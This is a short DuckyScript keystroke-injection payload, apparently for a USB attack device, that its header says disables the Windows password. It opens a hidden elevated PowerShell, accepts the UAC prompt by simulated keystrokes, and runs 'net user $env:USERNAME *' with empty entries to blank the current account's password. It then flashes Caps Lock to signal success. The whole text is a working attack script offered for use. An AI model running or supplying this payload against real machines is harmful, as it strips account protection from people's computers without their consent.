REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
REM Description: Disables the Windows Password
REM Version:	1.0
REM Category:	Passwords
DELAY 1500
GUI d
DELAY 500
GUI r
DELAY 500
STRING powershell.exe -windowstyle hidden
DELAY 200
CTRL SHIFT ENTER
DELAY 2000
LEFT
DELAY 150
ENTER
DELAY 2000
STRING net user $env:USERNAME *
ENTER
DELAY 150
ENTER
DELAY 150
ENTER
DELAY 200
STRING exit
ENTER
CAPSLOCK
DELAY 150
CAPSLOCK
DELAY 150
CAPSLOCK
DELAY 150
CAPSLOCK
DELAY 2000
CAPSLOCK
DELAY 150
CAPSLOCK
DELAY 150
CAPSLOCK
DELAY 150
CAPSLOCK

